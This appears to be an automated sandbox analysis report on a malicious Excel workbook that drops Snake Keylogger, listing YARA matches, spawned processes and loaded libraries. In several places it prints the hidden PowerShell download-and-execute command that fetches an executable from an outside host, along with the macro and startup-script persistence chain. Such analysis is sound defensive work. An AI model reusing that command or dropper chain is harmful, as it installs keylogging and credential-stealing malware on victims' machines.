              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_0212CC0F8_2_0212CC0F
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_0212EC898_2_0212EC89
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_0212ED308_2_0212ED30
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_0212ED208_2_0212ED20
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_021275588_2_02127558
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_023AC0208_2_023AC020
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_023AD2198_2_023AD219
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_023AC3478_2_023AC347
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_023A00408_2_023A0040
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_023A78E08_2_023A78E0
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_023A8D488_2_023A8D48
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_023A8D408_2_023A8D40
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_044B00408_2_044B0040
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_054000408_2_05400040
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_0540001A8_2_0540001A
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_0541E3508_2_0541E350
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_0541DEF88_2_0541DEF8
              Source: 7qsPAygCOx.xlsxOLE, VBA macro line: Private Sub Workbook_Open()
              Source: BA230000.0.drOLE, VBA macro line: Private Sub Workbook_Open()
              Source: 7qsPAygCOx.xlsxOLE indicator, VBA macros: true
              Source: BA230000.0.drOLE indicator, VBA macros: true
              Source: 7qsPAygCOx.xlsxStream path 'VBA/__SRP_0' : https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -Out*File $TempFile; St*art-Proce*ss $TempFile;,^WScript.Shellqa1"hExecF
              Source: BA230000.0.drStream path 'VBA/__SRP_0' : https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -Out*File $TempFile; St*art-Proce*ss $TempFile;,^WScript.ShellQa1"hExecF
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\tmp7752.exe 13CB2135790780947BE355C3C9ED42BE1987C9E64D6CD0C43A5A4C5AE289DC30
              Source: 5.2.tmp7752.exe.3825570.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 5.2.tmp7752.exe.3825570.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 5.2.tmp7752.exe.3825570.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 5.2.tmp7752.exe.3825570.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 5.2.tmp7752.exe.3825570.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 5.2.tmp7752.exe.3825570.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 5.2.tmp7752.exe.3825570.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 5.2.tmp7752.exe.3825570.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000008.00000002.519583396.000000000361A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000008.00000002.519583396.000000000361A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000005.00000002.489076925.000000000297A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000008.00000002.515916889.00000000026ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000005.00000002.491454590.0000000003821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000005.00000002.491454590.0000000003821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: Process Memory Space: tmp7752.exe PID: 3756, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: tmp7752.exe PID: 3756, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: Process Memory Space: svcost.exe PID: 3928, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: svcost.exe PID: 3928, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: tmp7752.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: svcost.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: 5.2.tmp7752.exe.3825570.5.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 5.2.tmp7752.exe.3825570.5.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 5.2.tmp7752.exe.3825570.5.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 5.2.tmp7752.exe.3825570.5.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 5.2.tmp7752.exe.390b810.7.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
              Source: 5.2.tmp7752.exe.390b810.7.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
              Source: 5.2.tmp7752.exe.390b810.7.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
              Source: 5.2.tmp7752.exe.390b810.7.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
              Source: 5.2.tmp7752.exe.395b830.3.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
              Source: 5.2.tmp7752.exe.395b830.3.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
              Source: 5.2.tmp7752.exe.395b830.3.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
              Source: 5.2.tmp7752.exe.395b830.3.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
              Source: 5.2.tmp7752.exe.390b810.7.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 5.2.tmp7752.exe.395b830.3.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 5.2.tmp7752.exe.395b830.3.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 5.2.tmp7752.exe.e40000.0.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
              Source: 5.2.tmp7752.exe.e40000.0.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
              Source: 5.2.tmp7752.exe.395b830.3.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
              Source: 5.2.tmp7752.exe.390b810.7.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
              Source: 5.2.tmp7752.exe.390b810.7.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 5.2.tmp7752.exe.e40000.0.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
              Source: 5.2.tmp7752.exe.390b810.7.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 5.2.tmp7752.exe.390b810.7.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
              Source: 5.2.tmp7752.exe.390b810.7.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
              Source: 5.2.tmp7752.exe.395b830.3.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 5.2.tmp7752.exe.e40000.0.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 5.2.tmp7752.exe.e40000.0.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 5.2.tmp7752.exe.e40000.0.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@8/14@1/1
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$7qsPAygCOx.xlsxJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeMutant created: NULL
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC927.tmpJump to behavior
              Source: 7qsPAygCOx.xlsxOLE indicator, Workbook stream: true
              Source: BA230000.0.drOLE indicator, Workbook stream: true
              Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..................V...............V.................O...........Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..................V...............V.................O...........Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..................V...............V.................O...........Jump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: 7qsPAygCOx.xlsxReversingLabs: Detection: 47%
              Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\tmp7752.exe "C:\Users\user\AppData\Local\Temp\tmp7752.exe"
              Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\svcost.exe "C:\Users\user\AppData\Roaming\svcost.exe"
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\tmp7752.exe "C:\Users\user\AppData\Local\Temp\tmp7752.exe" Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\svcost.exe "C:\Users\user\AppData\Roaming\svcost.exe" Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeSection loaded: bcrypt.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeSection loaded: bcrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: 7qsPAygCOx.xlsxInitial sample: OLE zip file path = xl/media/image1.png
              Source: BA230000.0.drInitial sample: OLE zip file path = xl/media/image1.png
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
              Source: Binary string: C:\Users\user\AppData\Local\Temp\tmp7752.PDBP source: tmp7752.exe, 00000005.00000002.488510973.0000000000447000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Roaming\svcost.PDBO source: svcost.exe, 00000008.00000002.515173603.0000000000418000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: tmp7752.exe, 00000005.00000002.488982546.0000000000E40000.00000004.08000000.00040000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000395B000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000389D000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.000000000266B000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbles\;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERNAME=Al$$ source: svcost.exe, 00000008.00000002.520082230.0000000005150000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: tmp7752.exe, 00000005.00000002.488982546.0000000000E40000.00000004.08000000.00040000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000395B000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000389D000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.000000000266B000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: tmp7752.exe, 00000005.00000002.492258851.0000000004A20000.00000004.08000000.00040000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000389D000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.0000000003866000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.00000000024F6000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: :\Windows\mscorlib.pdbpdblib.pdb source: tmp7752.exe, 00000005.00000002.488544480.000000000054F000.00000004.00000020.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515284150.0000000000540000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: tmp7752.exe, 00000005.00000002.492258851.0000000004A20000.00000004.08000000.00040000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000389D000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.0000000003866000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.00000000024F6000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: i0C:\Windows\mscorlib.pdbP source: tmp7752.exe, 00000005.00000002.488510973.0000000000447000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: i0C:\Windows\mscorlib.pdbO source: svcost.exe, 00000008.00000002.515173603.0000000000418000.00000004.00000010.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              .NET source code contains potential unpacker
              Source: 5.2.tmp7752.exe.390b810.7.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 5.2.tmp7752.exe.390b810.7.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 5.2.tmp7752.exe.390b810.7.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
              Source: 5.2.tmp7752.exe.395b830.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 5.2.tmp7752.exe.395b830.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 5.2.tmp7752.exe.395b830.3.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
              Source: 5.2.tmp7752.exe.e40000.0.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 5.2.tmp7752.exe.e40000.0.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 5.2.tmp7752.exe.e40000.0.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
              Suspicious powershell command line found
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;Jump to behavior
              Yara detected Costura Assembly Loader
              Source: Yara matchFile source: 5.2.tmp7752.exe.4a80000.10.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.492354767.0000000004A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.515916889.00000000024F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.489076925.0000000002882000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: tmp7752.exe PID: 3756, type: MEMORYSTR
